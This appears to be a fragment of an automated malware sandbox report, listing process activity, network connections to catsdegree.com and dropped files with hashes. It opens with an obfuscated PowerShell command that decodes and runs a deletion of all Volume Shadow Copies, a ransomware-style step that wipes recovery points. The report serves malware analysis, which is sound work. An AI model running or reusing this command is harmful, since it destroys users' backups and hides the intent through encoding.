powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
| US | 8.8.8.8:53 | 58.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
Files
memory/2704-118-0x0000000000400000-0x000000000083B000-memory.dmp
memory/2704-119-0x0000000000AD1000-0x0000000000ADC000-memory.dmp
memory/2704-121-0x0000000000400000-0x000000000083B000-memory.dmp
memory/2704-120-0x0000000000030000-0x0000000000040000-memory.dmp
memory/2012-122-0x0000000000000000-mapping.dmp
memory/2012-124-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
memory/2012-123-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
memory/2012-125-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
memory/2012-126-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
memory/2012-127-0x0000023B22E50000-0x0000023B22E51000-memory.dmp
memory/2012-128-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
memory/2012-129-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
memory/2012-130-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
memory/2012-131-0x0000023B3BE70000-0x0000023B3BE71000-memory.dmp
memory/2012-132-0x0000023B21540000-0x0000023B21542000-memory.dmp
memory/2012-133-0x0000023B21543000-0x0000023B21545000-memory.dmp
memory/2012-134-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
memory/2012-142-0x0000023B21546000-0x0000023B21548000-memory.dmp
memory/2012-147-0x0000023B212A0000-0x0000023B212A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4d2785eaba9f4bf1edd64700fb871848 |
| SHA1 | d95cb161fdd4e7d4700ab7dc8da2cad5614faa79 |
| SHA256 | 805b7048c72f39a3719f91e60aa01501e7155586f55a43b5dfc28bd511eba8cc |
| SHA512 | 4674f7b7a154be58c08842f337defdafab9b56b0acbd0ba9ef9b9caebcd67e437ad2011d73a8a542772298fe854660ea5ff5d8743adb9664344094d22d4dc930 |